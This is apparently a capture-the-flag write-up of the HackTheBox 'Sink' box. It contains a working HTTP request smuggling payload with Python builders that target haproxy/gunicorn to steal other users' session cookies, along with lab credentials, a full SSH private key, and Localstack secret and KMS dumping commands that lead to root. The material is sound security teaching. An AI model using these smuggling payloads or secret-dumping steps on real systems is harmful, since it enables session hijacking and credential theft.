Sink is an Insane-rated box on HackTheBox that was incredibly fun and difficult. Its unusual technologies and attack vectors taught me a lot about cloud tooling and HTTP request smuggling, a topic I was previously only vaguely familiar with.

Walkthrough

An nmap scan, followed by a full port and script scan, reveals the following information:

┌──(root💀kali)-[/home/kali]

└─# nmap -sVC -p 22,3000,5000 10.10.10.225

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)

| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)

|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)

3000/tcp open ppp?

| fingerprint-strings:

| GenericLines, Help:

| HTTP/1.1 400 Bad Request

| Content-Type: text/plain; charset=utf-8

| Connection: close

| Request

| GetRequest:

| HTTP/1.0 200 OK

5000/tcp open http Gunicorn 20.0.0

|_http-server-header: gunicorn/20.0.0

|_http-title: Sink Devops

......

Based on the scan, ports 3000 and 5000 are both serving HTTP. Browsing to them shows that 3000 is hosting Gitea.

5000 is running a custom application behind gunicorn that has a registration feature.

There don’t appear to be any weak or default credentials for this Gitea instance, and this version is patched against an authenticated RCE vulnerability, so I’ll go ahead with registering and browsing the gunicorn application. There are a few interesting functions like notes and comments, but fuzzing them for XSS, IDOR, and SSTI turns up nothing.

However, there are some interesting headers being shown in Burp. The response for any request made on the application has these headers:

HTTP/1.1 200 OK

Server: gunicorn/20.0.0

Date: Thu, 05 May 2022 06:23:19 GMT

Connection: close

Content-Type: text/html; charset=utf-8

Content-Length: 4259

Vary: Cookie

Via: haproxy

X-Served-By: a3308a3f1e59

After some googling, haproxy turns out to be a reverse proxy, which means gunicorn is actually a backend server: our requests go to haproxy, which forwards them to gunicorn. There also seems to be a vulnerability when an old version of haproxy is used in front of gunicorn. To find the haproxy version, I sent a malformed HTTP request; haproxy rejects it itself instead of forwarding it, and its error response reveals the version in the Server header. This is possible through Burp, but I happened to do it through netcat.

┌──(root💀kali)-[/home/kali]

└─# nc -vn 10.10.10.225 5000

Ncat: Version 7.92 ( https://nmap.org/ncat )

Ncat: Connected to 10.10.10.225:5000.

GET /

HTTP/1.0 400 Bad request

Server: haproxy 1.9.10

Cache-Control: no-cache

Connection: close

Content-Type: text/html

<html><body><h1>400 Bad request</h1>

Your browser sent an invalid request.

</body></html>
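For anyone who would rather script this check than type into netcat, here is a minimal Python sketch of the same idea. The function names are my own, the probe is the same bare GET / line used above, and the parsing simply assumes the proxy answers with ordinary headers like the response shown.

```python
import socket
from typing import Optional


def server_header(raw_response: bytes) -> Optional[str]:
    """Return the value of the Server header from a raw HTTP response, if any."""
    text = raw_response.replace(b"\r\n", b"\n")
    head = text.split(b"\n\n", 1)[0]
    for line in head.split(b"\n")[1:]:  # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"server":
            return value.strip().decode("latin-1")
    return None


def probe(host: str, port: int, timeout: float = 5.0) -> Optional[str]:
    """Send a deliberately incomplete request line and read the proxy's reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"GET /\r\n\r\n")  # no HTTP version, as in the nc session
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return server_header(b"".join(chunks))
```

Calling probe("10.10.10.225", 5000) should report the same Server value as the netcat session, assuming the service still behaves the way it did above.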

This is a vulnerable version of haproxy. Using this DEFCON CTF article and blog post, we can try to craft a payload. The attack is called HTTP Desync, and it belongs to the class of attacks known as HTTP Request Smuggling. Our payload will look like this:

POST /comment HTTP/1.1

Host: 10.10.10.225:5000

Cookie: session=eyJlbWFpbCI6ImJydWhAYnJ1aC5odGIifQ.YnV34g.2LWa7C08dNV7fps-gJGMgi5-FII

Transfer-Encoding:

chunked

Content-Type: application/x-www-form-urlencoded

Content-Length: 218

0

POST /comment HTTP/1.1

Host: 10.10.10.225:5000

Cookie: session=eyJlbWFpbCI6ImJydWhAYnJ1aC5odGIifQ.YnV34g.2LWa7C08dNV7fps-gJGMgi5-FII

Content-Type: application/x-www-form-urlencoded

Content-Length: 50

msg=

Replace the session cookie with yours. The vertical tab character (0x0b) in the Transfer-Encoding header can be added in Burp by typing the following base64 string where the character should go: Cwo=. Then highlight the string and press Ctrl+Shift+B to base64-decode it in place.
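The payload can also be assembled in code, which avoids hand-editing the control character and the outer Content-Length. The sketch below is only an illustration: the function name and parameters are hypothetical, and I am assuming that only the vertical tab (the first byte Cwo= decodes to) needs to sit between the colon and “chunked”.

```python
import base64

# The Burp string from above decodes to a vertical tab followed by a line feed.
BURP_BYTES = base64.b64decode("Cwo=")
VT = BURP_BYTES[:1].decode("ascii")  # "\x0b"


def build_desync_payload(host: str, session: str, capture_len: int = 50) -> bytes:
    """Build the outer request with the smuggled POST as its body."""
    smuggled = "\r\n".join([
        "POST /comment HTTP/1.1",
        f"Host: {host}",
        f"Cookie: session={session}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {capture_len}",  # deliberately larger than "msg="
        "",
        "msg=",
    ]).encode("ascii")
    # "0\r\n\r\n" is the terminating chunk that ends the first request for gunicorn.
    body = b"0\r\n\r\n" + smuggled
    head = "\r\n".join([
        "POST /comment HTTP/1.1",
        f"Host: {host}",
        f"Cookie: session={session}",
        f"Transfer-Encoding:{VT}chunked",  # vertical tab before "chunked"
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",  # computed so it always matches the body
        "",
        "",
    ]).encode("ascii")
    return head + body
```

The resulting bytes would then be written to a raw socket (or pasted into Burp with automatic Content-Length updating turned off), with capture_len raised as needed.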

The CVE behind this HTTP Desync works as follows: the vertical tab in the Transfer-Encoding header makes haproxy and gunicorn disagree about how to parse the request. Because of the vertical tab, haproxy does not treat the header value as “chunked”, so it ignores it and uses the Content-Length to determine the size of the body being sent. However, when the request is forwarded to gunicorn, gunicorn strips the vertical tab as whitespace and sees a normal chunked Transfer-Encoding. Transfer-Encoding takes precedence over Content-Length in a request, so gunicorn interprets the body as chunked.

#RFC 2616 4.4.3

If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.

In a chunked request, every chunk starts with its length as a hex number, followed by the chunk data. When there are no more chunks left, a chunk of length 0 signifies the end of the body. With this smuggling technique, Content-Length : Transfer-Encoding (CL:TE), we can capture the next web request. The CVE is essentially what allows us to use the CL:TE method.
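To make the chunked framing concrete, here is a small decoder sketch in Python. It is not gunicorn’s parser, just a simplified stand-in (no trailers, no chunk extensions) that shows how a body ending in a 0 chunk leaves the remaining bytes on the connection to be read as a new request.

```python
from typing import Tuple


def read_chunked(stream: bytes) -> Tuple[bytes, bytes]:
    """Decode one chunked body; return (decoded body, bytes left on the connection)."""
    body = b""
    pos = 0
    while True:
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol], 16)  # chunk length is hexadecimal
        pos = eol + 2
        if size == 0:
            # Terminating chunk: skip the blank line that follows it
            # (trailers are not handled in this sketch).
            if stream[pos:pos + 2] == b"\r\n":
                pos += 2
            return body, stream[pos:]
        body += stream[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


# What the backend receives as the "body" of our first POST.
forwarded = b"0\r\n\r\nPOST /comment HTTP/1.1\r\nContent-Length: 50\r\n\r\nmsg="
first_body, leftover = read_chunked(forwarded)
```

Here first_body is empty and leftover begins with the second POST, which is exactly the part a chunked-aware backend would treat as a separate request.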

We leverage this through the second request. The first request was taken as chunked and is terminated by the 0, so our second POST request is now parsed as its own request. Its Content-Length header is larger than its actual body, so when the next request is forwarded by haproxy, it is appended to our POST body, up to the number of bytes the Content-Length permits. Because our incomplete POST ends with the msg parameter used by the comment endpoint, the start of the next request, headers included, will appear in the comment. By running this payload a few times, we’ll eventually see this output on the home page:

We captured the activity of some other client on this webpage! Our Content-Length was too small, though, so if we increase it, we might catch all of the request headers, including cookies. After testing, the optimal Content-Length is 304.
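The effect of the Content-Length value can be illustrated with a toy model: the backend keeps reading bytes into our POST body until it has Content-Length of them. The victim request below is made up for the example and is not the real traffic from the box.

```python
def backend_reads(body_start: bytes, content_length: int, next_bytes: bytes) -> bytes:
    """Bytes the backend attributes to our POST body once more data arrives."""
    return (body_start + next_bytes)[:content_length]


# Hypothetical victim request, not the real traffic from the box.
victim = (
    b"GET /notes HTTP/1.1\r\n"
    b"Host: 10.10.10.225:5000\r\n"
    b"Cookie: session=VICTIM_SESSION\r\n\r\n"
)

short = backend_reads(b"msg=", 50, victim)    # stops before the Cookie header
longer = backend_reads(b"msg=", 304, victim)  # large enough to include it
```

With a length of 50 the captured comment ends before the Cookie header in this toy request, while 304 swallows all of it. On the real box the right number depends on the size of the victim’s headers, which is why it took some testing.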

There’s a cookie! Replace our cookie with that one and now we have access to the admin panel. Checking the notes out, there are several sets of credentials.

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C



The Dev Node credentials work for Gitea. Viewing our profile, there are several interesting repos.

After going through them for a bit, it seems this box is integrated with Localstack, a locally hosted emulation of AWS services. There is an endpoint on localhost:4566, and there is also an SSH key left within the Key_Management commit history (the commit tagged “Preparing for Prod”).

-----BEGIN OPENSSH PRIVATE KEY-----

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

-----END OPENSSH PRIVATE KEY-----

We can now SSH in as marcus!

┌──(root💀kali)-[/home/kali/HackTheBox/sink]

└─# ssh -i id_rsa marcus@10.10.10.225

Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)

Last login: Fri May 6 18:59:32 2022 from 10.10.16.3

marcus@sink:~$

We can enumerate Localstack via the awslocal command. The first things to look into are the keys and logs, because that’s what was presented to us in the Gitea repos. Running awslocal logs [random_text] with an invalid subcommand prints the list of valid subcommands for the logs endpoint.

marcus@sink:~$ awslocal logs asdf

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]

To see help text, you can run:

aws help

aws <command> help

aws <command> <subcommand> help

awslocal: error: argument operation: Invalid choice, valid choices are:

associate-kms-key | cancel-export-task

create-export-task | create-log-group

create-log-stream | delete-destination

delete-log-group | delete-log-stream

delete-metric-filter | delete-query-definition

delete-resource-policy | delete-retention-policy

delete-subscription-filter | describe-destinations

describe-export-tasks | describe-log-groups

describe-log-streams | describe-metric-filters

describe-queries | describe-query-definitions

describe-resource-policies | describe-subscription-filters

disassociate-kms-key | filter-log-events

get-log-events | get-log-group-fields

get-log-record | get-query-results

list-tags-log-group | put-destination

put-destination-policy | put-log-events

put-metric-filter | put-query-definition

put-resource-policy | put-retention-policy

put-subscription-filter | start-query

stop-query | tag-log-group

test-metric-filter | untag-log-group

help

“describe-log-groups” will give us the names of the log groups, “describe-log-streams” will then give us the log streams within a group, and lastly “get-log-events” takes the output of the previous two commands and shows us what’s actually going on.

marcus@sink:~$ awslocal logs describe-log-groups

{

"logGroups": [

{

"logGroupName": "cloudtrail",

"creationTime": 1651890601476,

"metricFilterCount": 0,

"arn": "arn:aws:logs:us-east-1:000000000000:log-group:cloudtrail",

"storedBytes": 91

}

]

}

marcus@sink:~$ awslocal logs describe-log-streams --log-group-name cloudtrail

{

"logStreams": [

{

"logStreamName": "20201222",

"creationTime": 1651890721741,

"firstEventTimestamp": 1126190184356,

"lastEventTimestamp": 1533190184356,

"lastIngestionTime": 1651890721760,

"uploadSequenceToken": "1",

"arn": "arn:aws:logs:us-east-1:2523:log-group:cloudtrail:log-stream:20201222",

"storedBytes": 91

}

]

}

marcus@sink:~$ awslocal logs get-log-events --log-group-name cloudtrail --log-stream-name 20201222

{

"events": [

{

"timestamp": 1126190184356,

"message": "RotateSecret",

"ingestionTime": 1651890901206

},

{

"timestamp": 1244190184360,

"message": "TagResource",

"ingestionTime": 1651890901206

},

{

"timestamp": 1412190184358,

"message": "PutResourcePolicy",

"ingestionTime": 1651890901206

},

{

"timestamp": 1433190184356,

"message": "AssumeRole",

"ingestionTime": 1651890901206

},

{

"timestamp": 1433190184358,

"message": "PutScalingPolicy",

"ingestionTime": 1651890901206

},

{

"timestamp": 1433190184360,

"message": "RotateSecret",

"ingestionTime": 1651890901206

},

{

"timestamp": 1533190184356,

"message": "RestoreSecret",

"ingestionTime": 1651890901206

}

],

"nextForwardToken": "f/00000000000000000000000000000000000000000000000000000006",

"nextBackwardToken": "b/00000000000000000000000000000000000000000000000000000000"

}
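The timestamps in this output look like Unix epoch milliseconds, which is how CloudWatch Logs normally reports them. As a small aid for reading the log, this Python sketch (the function name is my own) turns the JSON printed by get-log-events into readable UTC times paired with each message.

```python
import json
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def summarize_events(cli_output: str):
    """Turn get-log-events JSON into (UTC time, message) pairs."""
    events = json.loads(cli_output)["events"]
    return [
        ((EPOCH + timedelta(milliseconds=e["timestamp"])).isoformat(), e["message"])
        for e in events
    ]
```

Piping the command’s output into a script that calls summarize_events makes the order of RotateSecret and RestoreSecret events easier to follow than raw millisecond values.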

It seems there has been some rotation of secrets; that’s something we should also investigate. There is a Secrets Manager service, and similarly to logs, we will use one command to list the secrets and another to dump them.

marcus@sink:~$ awslocal secretsmanager list-secrets

"SecretList": [

{

"ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-axAxg",

"Name": "Jenkins Login",

"Description": "Master Server to manage release cycle 1",

"KmsKeyId": "",

"RotationEnabled": false,

"RotationLambdaARN": "",

"RotationRules": {

"AutomaticallyAfterDays": 0

},

"Tags": [],

"SecretVersionsToStages": {

"969f2b2e-0a6d-45a6-bcde-1a9867ba7960": [

"AWSCURRENT"

]

}

},

...

And we can dump them by passing their name as the secret ID.

marcus@sink:~$ awslocal secretsmanager get-secret-value --secret-id 'Jira Support'

{

"ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-MFaTX",

"Name": "Jira Support",

"VersionId": "9ca485d6-43dd-4850-a450-9d42c290a7fd",

"SecretString": "{\"username\":\"david@sink.htb\",\"password\":\"EALB=bcC=`a7f2#k\"}",

"VersionStages": [

"AWSCURRENT"

],

"CreatedDate": 1651739312

}
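Note that SecretString is itself a JSON document stored as a string inside the outer JSON, which is why the quotes are escaped. A minimal Python sketch for pulling the credentials out, with a function name of my own choosing, parses it twice:

```python
import json


def extract_credentials(cli_output: str) -> dict:
    """Parse get-secret-value output, then parse the JSON held in SecretString."""
    outer = json.loads(cli_output)
    return json.loads(outer["SecretString"])
```

Applied to the output above, this would return a dictionary with the username and password keys, which avoids mistakes when copying a password full of special characters by hand.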

The credentials in the SecretString for the “Jira Support” secret work, and we can move over to the david user. Inside david’s home directory is a Projects/Prod_Deployment directory containing a file called servers.enc. The Gitea repo mentioned keys, and keys can be used to encrypt and decrypt files, so we should look into that. We can use the kms command within awslocal to interact with the Key Management Service endpoint, and there is a command to list the keys.

david@sink:~/Projects/Prod_Deployment$ awslocal kms list-keys

{

"KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",

"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac"

},

...

Describing each key by ID shows a list of its properties.

david@sink:~/Projects/Prod_Deployment$ awslocal kms describe-key --key-id 0b539917-5eff-45b2-9fa1-e13f0d2c42ac

{

"KeyMetadata": {

"AWSAccountId": "000000000000",

"KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",

"Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac",

"CreationDate": 1609757848,

"Enabled": false,

"Description": "Encryption and Decryption",

"KeyUsage": "ENCRYPT_DECRYPT",

"KeyState": "Disabled",

"Origin": "AWS_KMS",

"KeyManager": "CUSTOMER",

"CustomerMasterKeySpec": "RSA_4096",

"EncryptionAlgorithms": [

"RSAES_OAEP_SHA_1",

"RSAES_OAEP_SHA_256"

]

}

}

After describing them all, there are two enabled keys with the following functions:

Key_ID => Function (Algorithms)

804125db-bdf1-465a-a058-07fc87c0fad0 => ENCRYPT_DECRYPT (RSAES_OAEP_SHA_1, RSAES_OAEP_SHA_256)

c5217c17-5675-42f7-a6ec-b5aa9b9dbbde => SIGN_VERIFY (ECDSA_SHA_512)
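Describing every key by hand gets tedious, so the filtering step can be sketched in Python. The function below is hypothetical and assumes you have already collected the KeyMetadata object from each describe-key call into a list; it keeps only the keys that are enabled and usable for decryption.

```python
def usable_decrypt_keys(metadata_list):
    """Return the KeyIds that are enabled and meant for encryption/decryption."""
    return [
        meta["KeyId"]
        for meta in metadata_list
        if meta.get("Enabled") and meta.get("KeyUsage") == "ENCRYPT_DECRYPT"
    ]
```

Given the metadata described above, only 804125db-bdf1-465a-a058-07fc87c0fad0 should come back, since the other enabled key is for SIGN_VERIFY.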

The first key will probably help us do the decryption. According to the documentation, we can decrypt the file by specifying the key, a file blob to decrypt, and the algorithm it was encrypted with.

david@sink:~/Projects/Prod_Deployment$ awslocal kms decrypt --ciphertext-blob fileb://servers.enc --key-id 804125db-bdf1-465a-a058-07fc87c0fad0 --encryption-algorithm RSAES_OAEP_SHA_256

{

"KeyId": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0",

"Plaintext": "H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=",

"EncryptionAlgorithm": "RSAES_OAEP_SHA_256"

}

The Plaintext value is a base64-encoded string. Decoding it into a file and trying to read it doesn’t reveal much, but running file on it shows that it’s actually a gzip file.

david@sink:~/Projects/Prod_Deployment$ echo "H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=" | base64 -d > decoded

david@sink:~/Projects/Prod_Deployment$ cat decoded

贁11\JKK#$?DA18r2KRSRE%V

EpNѵOvnvū쩶;veey״F+O-gQ!(-j28J!4*4P5#-ՈkbDbh/L!,榦QY#ꉅ[S

cԇݱ+<.Xݠ;K>ٵZ^&├\:┐ίZP41

F(◆Q▮

F(◆Q▮

F(◆Q▮

F(◆Q▮

david@sink:~/Projects/Prod_Deployment$ file decoded

decoded: gzip compressed data, from Unix, original size modulo 2^32 10240

Renaming it, decompressing it, and running file on it once again now tells us that it’s a tar file.

david@sink:~/Projects/Prod_Deployment$ mv decoded decoded.gz ; gzip -d decoded.gz ; file decoded

decoded: POSIX tar archive (GNU)
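The whole chain (base64, then gzip, then tar) can also be unwrapped in one go. This is a minimal Python sketch using only the standard library; the function name is mine, and it assumes the Plaintext value has the same layering as the one above. As a side note, the leading H4sI of the string is simply the base64 form of the gzip magic bytes, which the sketch checks for.

```python
import base64
import gzip
import io
import tarfile


def unpack_plaintext(plaintext_b64: str) -> dict:
    """Decode base64, gunzip, and return {file name: contents} from the tar inside."""
    raw = base64.b64decode(plaintext_b64)
    if raw[:2] != b"\x1f\x8b":  # gzip magic bytes
        raise ValueError("decoded data is not gzip")
    tar_bytes = gzip.decompress(raw)
    files = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar.getmembers():
            if member.isfile():
                files[member.name] = tar.extractfile(member).read()
    return files
```

Everything stays in memory, so nothing is written to david’s directory, and the returned dictionary can be inspected directly.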

Extracting it reveals two files, and one of them has credentials that work for root!

david@sink:~/Projects/Prod_Deployment$ tar -xvf decoded

servers.yml

servers.sig

david@sink:~/Projects/Prod_Deployment$ cat servers.yml

server:

listenaddr: ""

port: 80

hosts:

- certs.sink.htb

- vault.sink.htb

defaultuser:

name: admin

pass: _uezduQ!EY5AHfe2

david@sink:~/Projects/Prod_Deployment$ su root

Password:

root@sink:/home/david/Projects/Prod_Deployment#

There we go!

Afterthoughts

This was a really cool box. While the writeup is kind of short, each step took a lot of research before I could actually do it. The smuggling took a very long time to perform and understand, and figuring out how to interact with the Localstack endpoints was very fun and difficult. I ended up finding endpoints for IAM and S3 buckets, but they were empty. Overall, this box was super cool and felt realistic with the amount of enumeration it took, along with the combination of technologies it used. After this, I really want to look into Localstack some more, since I had never heard of it until now.

–Dylan Tran 5/6/22